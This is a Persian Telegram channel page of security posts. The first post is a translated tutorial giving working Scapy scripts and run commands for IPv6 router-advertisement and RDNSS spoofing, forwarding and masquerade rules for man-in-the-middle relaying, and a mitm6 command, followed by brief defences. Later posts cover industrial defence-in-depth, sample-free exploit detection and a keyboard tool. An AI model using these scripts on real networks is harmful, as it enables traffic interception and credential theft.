Mr. SAM – Telegram
Mr. SAM
147 subscribers
131 photos
7 videos
23 files
751 links
سه‌شنبه
۹ ‏( دی = ۱۰ )‏ ۱٤۰٤
‏30 ( دسامبر = december = 12 ) 2025
تکنیک‌ها ، کالبدشکافی ، درک عمیق ، یک قدم جلوتر ...
https://news.1rj.ru/str/boost/NullError_ir
Download Telegram
#!/usr/bin/env python3

from scapy.all import *
import argparse

def main():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--interface", required=True, help="Network interface (e.g., eth0)")
parser.add_argument("-m", "--mac", required=True, help="Spoofed MAC address to include in the RA")
parser.add_argument("--llip", required=True, help="Your link-local IPv6 address")
parser.add_argument("-l", "--lifetime", type=int, default=1800, help="Router Lifetime in seconds (default: 1800)")
parser.add_argument("--interval", type=int, default=5, help="Interval between packets (default: 5 seconds)")
parser.add_argument("--revert", action="store_true", help="Send RA with router lifetime = 0 to remove route")

args = parser.parse_args()

lifetime = 0 if args.revert else args.lifetime

ra = IPv6(src=args.llip, dst="ff02::1", hlim=255) / \
ICMPv6ND_RA(routerlifetime=lifetime) / \
ICMPv6NDOptSrcLLAddr(lladdr=args.mac)

mode = "REVERT" if args.revert else "SPOOF"
print(f"[+] Sending {mode} RA on {args.interface}")
print(f" Source LL IP: {args.llip}")
print(f" MAC: {args.mac}")
print(f" Lifetime: {lifetime}s")
print(f" Interval: {args.interval}s")

send(ra, iface=args.interface, loop=1, inter=args.interval)

if __name__ == "__main__":
main()



نحوه اجرا:

sudo python3 RA.py --interface eth0 --mac 00:50:00:00:01:00 --lifetime 300 --interval 5 --llip fe80:250:ff:fe00:100


پس از اجرای این حمله، آدرس link-local مهاجم به عنوان گیت‌وی پیش‌فرض در سطح IPv6 روی سیستم قربانی تنظیم می‌شود و تمام ترافیک او از طریق ماشین مهاجم عبور خواهد کرد.

چالش‌های مسیریابی: از کار انداختن شبکه قربانی!

یک اشتباه رایج در اجرای RA Spoofing، نادیده گرفتن تنظیمات مسیریابی در سمت مهاجم است. حتی اگر قربانی RA جعلی شما را بپذیرد، ترافیک او به سمت شما می‌آید، اما اگر شما نتوانید آن را به درستی به مقصد برسانید و پاسخ را برگردانید، اتصال قربانی قطع می‌شود\!

برای جلوگیری از این فاجعه، باید مسیریابی (forwarding) را روی سیستم خود فعال کنید:

# فعال‌سازی forwarding برای IPv6
sudo sysctl -w net.ipv6.conf.all.forwarding=1

# اجازه عبور ترافیک در فایروال
sudo ip6tables -A FORWARD -i eth0 -j ACCEPT

# حل مشکل بازگشت ترافیک با Masquerading
sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE


دستور آخر (MASQUERADE) آدرس IPv6 مبدأ بسته‌های خروجی را با آدرس مهاجم جایگزین می‌کند. این کار تضمین می‌کند که پاسخ‌ها از اینترنت به ماشین شما بازگردند و شما بتوانید آن‌ها را به قربانی تحویل دهید.

حمله جعل سرور DNS با RDNSS

گزینه RDNSS (Recursive DNS Server) مکانیزمی است که به روتر اجازه می‌دهد آدرس سرورهای DNS را مستقیماً از طریق بسته‌های RA به کلاینت‌ها ارسال کند، بدون نیاز به DHCPv6.

نقطه حمله:
مهاجم بسته‌های RA حاوی آدرس یک سرور DNS جعلی (که خودش است) را ارسال می‌کند. کلاینت‌هایی که از RDNSS پشتیبانی می‌کنند (اکثر سیستم‌عامل‌های مدرن مانند ویندوز ۱۰ و ۱۱)، این آدرس را پذیرفته و تمام درخواست‌های DNS خود را به سمت مهاجم ارسال می‌کنند. این کار به مهاجم کنترل کامل بر ترجمه نام‌های دامنه در شبکه را می‌دهد.

اسکریپت حمله RDNSS Spoofing

@NullError_ir 📢
#!/usr/bin/env python3

from scapy.all import *
import argparse

def send_rdns_spoof(args):
ra = IPv6(
src=args.llip,
dst="ff02::1",
hlim=255) / ICMPv6ND_RA(routerlifetime=0) / ICMPv6NDOptRDNSS(dns=[args.dns], lifetime=args.lifetime)

print(f"[+] Sending RDNSS RA on {args.interface}")
print(f" Source LL IP: {args.llip}")
print(f" DNS: {args.dns}")
print(f" Lifetime: {args.lifetime}s")
print(f" Interval: {args.interval}s")

send(ra, iface=args.interface, loop=1, inter=args.interval)

def main():
parser = argparse.ArgumentParser(denoscription="RDNSS Spoofing via IPv6 RA")
parser.add_argument("-i", "--interface", required=True, help="Network interface (e.g. eth0)")
parser.add_argument("--llip", required=True, help="Link-local IPv6 address (source IP)")
parser.add_argument("--dns", required=True, help="DNS server to inject (IPv6 address)")
parser.add_argument("--lifetime", type=int, default=600, help="RDNSS option lifetime (default: 600 seconds)")
parser.add_argument("--interval", type=int, default=5, help="Interval between packets in seconds")

args = parser.parse_args()
send_rdns_spoof(args)

if __name__ == "__main__":
main()


نحوه اجرا:

sudo python3 rdnss.py -i eth0 --llip fe80::20c:29ff:fef0:470d --dns fe80::20c:29ff:fef0:470d --lifetime 100 --interval 30


برای بازگرداندن تغییرات و حذف DNS جعلی از سیستم قربانی، کافی است اسکریپت را با lifetime 0 اجرا کنید:

sudo python3 rdnss.py -i eth0 --llip fe80::20c:29ff:fef0:470d --dns fe80::20c:29ff:fef0:470d --lifetime 0


این حمله از mitm6 انعطاف‌پذیرتر است، زیرا به شما امکان کنترل دقیق بر روی پارامترهای بسته RA و زمان‌بندی حمله را می‌دهد.



رهگیری DNS با DHCPv6 (حمله mitm6)

ابزار mitm6 یکی از محبوب‌ترین ابزارها برای حمله به شبکه‌های ویندوزی است. این ابزار با تزریق بسته‌های DHCPv6، خود را به عنوان یک سرور DHCPv6 قانونی جا زده و آدرس DNS جعلی را در سطح IPv6 به کلاینت‌ها تحمیل می‌کند.

معمولاً ویندوز به صورت دوره‌ای بسته‌های DHCPv6 Solicit ارسال می‌کند تا یک سرور در شبکه پیدا کند. mitm6 به این درخواست‌ها با یک بسته Advertise پاسخ می‌دهد و آدرس خود را به عنوان سرور DNS معرفی می‌کند.

اجرای حمله:

sudo mitm6 -i eth0 --no-ra


پس از این حمله، آدرس link-local مهاجم به عنوان سرور DNS در سیستم قربانی ثبت می‌شود و راه را برای حملات بعدی مانند NTLM Relay**، رهگیری درخواست‌های DNS و حمله به WPAD باز می‌کند.

**چگونه از خود دفاع کنیم


برای جلوگیری از حملات جعل هویت در IPv6، مکانیزم‌های زیر در سطح لایه ۲ (سوئیچ) به کار می‌روند:

۔**RA Guard**: فیلتر کردن بسته‌های RA در سطح سوئیچ.

۔**DHCPv6 Guard**: مسدود کردن سرورهای DHCPv6 غیرمجاز روی پورت‌های خاص.

۔**ND Inspection**: فیلتر کردن پیام‌های NDP, RA و دیگر پیام‌های ICMPv6 بر اساس الگوها.

اما در دنیای واقعی:

* این مکانیزم‌ها اغلب به صورت پیش‌فرض غیرفعال هستند.

* در شبکه‌های ترکیبی IPv4/IPv6 به درستی پیکربندی نمی‌شوند.

* روی سوئیچ‌های قدیمی یا ارزان‌قیمت (به‌ویژه در شبکه‌های Wi-Fi) کار نمی‌کنند.

در نتیجه، حتی با وجود فعال بودن IPv6، لایه‌های حفاظتی یا غایب یا ناکارآمد هستند، که این حملات را در زیرساخت‌های واقعی کاملاً ممکن می‌سازد.


کلام آخر

بسیاری معتقدند بهترین راه حل، غیرفعال کردن کامل IPv6 است، اما این کار مشکل را حل نمیکند. مهم است که بفهمیم این فناوری چگونه کار می‌کند و چه اقدامات متقابلی در دسترس است. تحلیل مداوم و مطالعه عمیق پروتکل‌ها، مهارتی کلیدی است که بارها به کارتان خواهد آمد.

نویسنده اصلی مقاله: Magama Bazarov

@NullError_ir 📢
Forwarded from Mehraz Logs
لیست چنل‌های تلگرام فعال در حوزه امنیت سایبری و OSINT
(ایرانی و خارجی)
https://mehrazino.github.io/tg-cybersec
#useful
1
#cyber_security

قلعه دیجیتال صنعت نفت: معماری یک دفاع عمیق در برابر تهدیدات سایبری

صنعت نفت، گاز و پتروشیمی، شاهرگ حیاتی اقتصاد جهانی، در حال تجربه‌ی یک تحول دیجیتال عظیم است. اما این پیشرفت، شمشیر دولبه‌ای است. همگرایی فزاینده‌ی شبکه‌های فناوری اطلاعات (IT) و فناوری عملیاتی (OT)، در حالی که بهره‌وری را به اوج می‌رساند، دروازه‌هایی جدید به روی تهدیداتی خاموش اما ویرانگر گشوده است. دیگر دیوارهای سنتی و ایزوله‌سازی (Air-Gapping) به تنهایی کافی نیستند. امروز نیازمند یک معماری دفاعی عمیق (Defense-in-Depth) هستیم تا از این زیرساخت‌های حیاتی محافظت کنیم.

میدان نبرد مدرن: درک عمیق تهدیدات

برای ساختن یک دفاع مؤثر، ابتدا باید دشمن و میدان نبرد را به خوبی بشناسیم. چالش‌های امروز بسیار پیچیده‌تر از یک ویروس ساده هستند:

همگرایی IT/OT: مرز بین دنیای اداری و صنعتی در حال محو شدن است. یک ایمیل فیشینگ که کارمندی در بخش IT باز می‌کند، می‌تواند نقطه شروع حمله‌ای باشد که در نهایت به قلب سیستم‌های کنترل صنعتی (ICS) و SCADA در بخش OT نفوذ کرده و یک فاجعه عملیاتی رقم بزند.

آسیب‌پذیری سیستم‌های موروثی (Legacy Systems): بسیاری از کنترلرها (PLC) و سیستم‌های مانیتورینگ (HMI) بر پایه سیستم‌عامل‌های منسوخی مانند Windows XP کار می‌کنند که دیگر پشتیبانی امنیتی نمی‌شوند. فرآیند اعمال وصله‌های امنیتی (Patch Management) در این محیط‌ها به دلیل حساسیت عملیاتی و نیاز به تأییدیه فروشنده، بسیار دشوار و کند است.

پروتکل‌های ناامن صنعتی: پروتکل‌های کلاسیک صنعتی مانند Modbus و DNP3، برای دنیایی طراحی شده بودند که در آن امنیت سایبری یک دغدغه نبود. این پروتکل‌ها فاقد رمزنگاری و اصالت‌سنجی هستند و یک مهاجم حاضر در شبکه می‌تواند به راحتی دستورات کنترلی را جعل کند.

زنجیره تأمین و تهدیدات فیزیکی: حمله فقط از اینترنت نیست. یک حافظه USB آلوده که توسط یک پیمانکار به شبکه متصل می‌شود، می‌تواند تمام ساختار دفاعی شما را دور بزند. حمله معروف استاکس‌نت (Stuxnet) دقیقاً به همین روش آغاز شد و نشان داد که ایزوله‌سازی فیزیکی به تنهایی کافی نیست.

نقشه راه امنیت: ۵ ستون استراتژیک برای یک دفاع همه‌جانبه

مقابله با این تهدیدات پیچیده، نیازمند یک استراتژی چندلایه و هوشمند است که در ادامه، ۵ ستون اصلی آن را بررسی می‌کنیم.

۱. معماری امن شبکه: قلعه خود را اصولی بسازید!
این اولین و حیاتی‌ترین قدم است. یک شبکه مسطح (Flat Network) مانند یک زمین باز و بدون سنگر است. معماری صحیح به معنای بخش‌بندی (Segmentation) دقیق شبکه است.
جزئیات فنی: این بخش‌بندی باید بر اساس مدل مرجع Purdue یا استاندارد ISA/IEC 62443 انجام شود. مهم‌ترین اصل، ایجاد یک منطقه غیرنظامی صنعتی (Industrial DMZ) بین شبکه IT (سطح ۴ و ۵) و شبکه OT (سطح ۰ تا ۳) است. تمام ارتباطات باید از این منطقه حائل عبور کرده و به شدت کنترل شوند. برای حداکثر امنیت در انتقال داده از OT به IT، می‌توان از دروازه‌های یک‌طرفه (Unidirectional Gateways) استفاده کرد.

۲. امن‌سازی سیستم‌ها: زره هر سرباز را مستحکم کنید!
هر دستگاه در شبکه (HMI، سرور، ایستگاه مهندسی) یک سرباز در خط مقدم شماست. با کاهش سطح حمله یا Hardening**، زره این سربازان را تقویت می‌کنید.
**جزئیات فنی:
به جای تکیه بر آنتی‌ویروس‌های سنتی، از راهکار لیست سفید برنامه‌ها (Application Whitelisting) استفاده کنید تا فقط به نرم‌افزارهای مجاز اجازه اجرا داده شود. تمام پورت‌ها و سرویس‌های غیرضروری را غیرفعال کرده و کنترل دسترسی را بر پایه نقش (RBAC) و با احراز هویت چندعاملی (MFA)**، به خصوص برای دسترسی‌های راه دور، پیاده‌سازی کنید.

۳. کنترل دروازه‌های ورودی: از نفوذ غافلگیرانه جلوگیری کنید!
همانطور که استاکس‌نت نشان داد، حافظه‌های USB و لپ‌تاپ‌های پیمانکاران، اسب‌های تروای دنیای مدرن هستند.
جزئیات فنی: پیاده‌سازی کیوسک‌های پاک‌سازی مدیا (Media Sanitization Kiosks) یک راهکار عالی است. هر حافظه قابل حمل قبل از ورود به محیط OT، باید در این ایستگاه‌های ایزوله اسکن و پاک‌سازی شود. همچنین، باید با استفاده از پالیسی‌های سخت‌گیرانه (GPO)، استفاده از پورت‌های USB را در سیستم‌های حساس محدود کرد.

۴. پایش و تشخیص تهدید: دیده‌بان‌های هوشمند مستقر کنید!
شما نمی‌توانید با تهدیدی که نمی‌بینید، مبارزه کنید. ابزارهای امنیتی IT، زبان دنیای OT را نمی‌فهمند. شما به دیده‌بان‌های هوشمند و متخصص نیاز دارید.
جزئیات فنی: استقرار یک مرکز عملیات امنیت ویژه OT (OT-SOC) ضروری است. این مرکز باید مجهز به ابزارهای پایش پسیو شبکه باشد که با تحلیل عمیق بسته‌ها (DPI) برای پروتکل‌های صنعتی، هرگونه ناهنجاری یا رفتار مشکوک (مانند تلاش برای آپدیت Firmware یک PLC در خارج از برنامه) را فوراً شناسایی کنند.
@NullError_ir 📢
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
#cyber_security قلعه دیجیتال صنعت نفت: معماری یک دفاع عمیق در برابر تهدیدات سایبری صنعت نفت، گاز و پتروشیمی، شاهرگ حیاتی اقتصاد جهانی، در حال تجربه‌ی یک تحول دیجیتال عظیم است. اما این پیشرفت، شمشیر دولبه‌ای است. همگرایی فزاینده‌ی شبکه‌های فناوری اطلاعات…
۵. ارزیابی امنیتی و توانمندسازی نیروی انسانی: نقاط ضعف را قبل از دشمن پیدا کنید!
ضعیف‌ترین حلقه در زنجیره امنیت، همیشه انسان است؛ اما همین حلقه می‌تواند به قوی‌ترین سپر دفاعی شما نیز تبدیل شود.
جزئیات فنی: به جای اسکن فعال که می‌تواند به تجهیزات حساس OT آسیب بزند، از روش‌های ارزیابی آسیب‌پذیری پسیو استفاده کنید. تست‌های نفوذ (Penetration Testing) را با برنامه‌ریزی دقیق و توسط تیم‌های متخصص در امنیت OT انجام دهید. و مهم‌تر از همه، با برگزاری دوره‌های آموزشی و آگاهی‌رسانی مستمر، کارکنان خود را به عنوان اولین خط دفاعی در برابر حملات فیشینگ و مهندسی اجتماعی توانمند سازید.

کلام آخر

امنیت سایبری در صنعت نفت و گاز یک مقصد نیست، بلکه یک سفر دائمی است. این یک فرآیند مستمر از ارزیابی، تقویت و انطباق در برابر تهدیدات نوظهور است. با پیاده‌سازی یک استراتژی دفاعی عمیق که این پنج ستون را در بر گیرد، می‌توان از این شاهرگ حیاتی در برابر خطرات دنیای دیجیتال محافظت کرده و تداوم عملیات ایمن و پایدار را تضمین نمود.

@NullError_ir 📢
یکی از بزرگترین چالش فارسی زبانان حل کردم!
افزونه متن‌باز نوشتم ، اشتباهات رایج کیبورد (مثل \vs\,gds به پرسپولیس) و فینگلیش را به صورت آنی اصلاح می‌کند. این ابزار به عنوان دستیار دانش به ویکی‌پدیا و گوگل متصل است.
https://github.com/AmirMotefaker/Farsi-Smart-Assistant

@DevTwitter | <Amir Motefaker/>
#ELEGANTBOUNCER

شناسایی اکسپلویت‌ها بدون در اختیار داشتن نمونه‌ی آلوده
یک چالش بزرگ برای محققان امنیتی

چرا شناسایی بدون نمونه مهم است؟

در بسیاری از حملات هدفمند (Targeted Attacks)، مهاجمان بسیار مراقب هستند که نمونه‌های بدافزار یا اکسپلویت آن‌ها به دست محققان امنیتی نیفتد. اگر نمونه‌ای در دسترس نباشد، تیم‌های امنیتی نمی‌توانند:

یک امضا (Signature) برای آنتی‌ویروس‌ها بسازند.

رفتار آن را تحلیل کنند.

از آن برای پیدا کردن قربانیان دیگر استفاده کنند.

بنابراین، محققان باید روشی پیدا کنند تا «شکار» را بدون دیدن خود «شکارچی» انجام دهند.


تکنیک‌های شناسایی اکسپلویت بدون نمونه

این فرآیند مانند کار یک کارآگاه است که از روی صحنه جرم و شواهد موجود، به دنبال روش کار مجرم می‌گردد، حتی اگر خود مجرم را ندیده باشد. مراحل اصلی این کار به شرح زیر است:

۱. تحلیل ریشه آسیب‌پذیری (Vulnerability Root Cause Analysis)
همه چیز از درک عمیق خودِ حفره‌ی امنیتی شروع می‌شود.

گزارش‌های فنی
محققان گزارش‌های منتشر شده از سوی شرکت‌هایی مثل Citizen Lab یا دیگر غول های فناوری را به دقت مطالعه می‌کنند. برای مثال، در مورد FORCEDENTRY مشخص شد که آسیب‌پذیری در کتابخانه پردازش تصویر به نام CoreGraphics و به دلیل یک سرریز عدد صحیح (Integer Overflow) رخ می‌دهد.

مهندسی معکوس پچ (Patch Diffing)
یکی از قدرتمندترین تکنیک‌ها، مقایسه نسخه آسیب‌پذیر یک نرم‌افزار با نسخه پچ‌شده‌ی آن است. محققان با مقایسه این دو نسخه (مثلاً دو ورژن از سیستم‌عامل iOS)، دقیقاً متوجه می‌شوند که توسعه‌دهندگان کدام بخش از کد را برای رفع حفره تغییر داده‌اند. این تغییرات، مانند یک نقشه گنج، محل دقیق آسیب‌پذیری و منطق آن را آشکار می‌کند.


۲. بازسازی اکسپلویت (Exploit Recreation)
وقتی محقق فهمید که آسیب‌پذیری دقیقاً چگونه کار می‌کند، تلاش می‌کند تا یک PoC (Proof-of-Concept) بسازد.

یک فایل PoC بی‌خطر (مثلاً یک PDF یا عکس) که دقیقاً همان ساختار معیوب اکسپلویت اصلی را دارد تا بتواند همان آسیب‌پذیری را فعال کند (مثلاً باعث کرش کردن برنامه شود).

هدف: این PoC به محقق یک «نمونه پاک» می‌دهد. حالا او یک فایل در دست دارد که می‌داند چه ویژگی‌هایی باعث فعال شدن حفره امنیتی می‌شود، بدون اینکه آلوده به بدافزار باشد.

۳. توسعه قوانین شناسایی (Detection Rule Development)
حالا که محقق می‌داند یک فایل اکسپلویت‌کننده چه شکلی است، می‌تواند برای آن یک قانون شناسایی بنویسد.

قوانین یارا (YARA Rules):
یارا ابزاری است که به محققان اجازه می‌دهد الگوها و مشخصه‌های خاصی را در فایل‌ها جستجو کنند. برای FORCEDENTRY، محقق می‌تواند یک قانون یارا بنویسد که به دنبال فایل‌های PDF با ساختار عجیب و خاصی بگردد که برای سوءاستفاده از آن حفره طراحی شده‌اند.

ابزارسازی:
ابزاری مانند ELEGANTBOUNCER در واقع همین قوانین و منطق‌های تشخیصی را در قالبی ساده و کاربردی پیاده‌سازی می‌کند. این ابزار فایل‌ها را اسکن کرده و در صورت تطابق با الگوی اکسپلویت، هشدار می‌دهد.

مثال ساده برای درک بهتر:

فرض کنید یک دزد همیشه از یک نوع قفل خاص با یک سنجاق سر دست‌کاری‌شده عبور می‌کند. شما خود دزد را ندیده‌اید و ابزار او را هم ندارید.

1. تحلیل آسیب‌پذیری: شما قفل را بررسی کرده و می‌فهمید که ضعف آن در پین شماره ۳ است.

2. بازسازی: خودتان یک سنجاق سر را طوری خم می‌کنید که بتواند پین شماره ۳ را دستکاری کند.

3. توسعه قانون شناسایی: یک سیستم هشدار طراحی می‌کنید که به محض وارد شدن ابزاری با آن شکل خاص (شکل سنجاق سر شما) به قفل، آژیر بکشد.

در این نوشته ELEGANTBOUNCER همان سیستم هشدار است که بدون دیدن دزد اصلی، روش کار او را شناسایی می‌کند. این دانش، اساس دفاع پیشگیرانه در امنیت سایبری مدرن است.

@NullError_ir 📢
Please open Telegram to view this post
VIEW IN TELEGRAM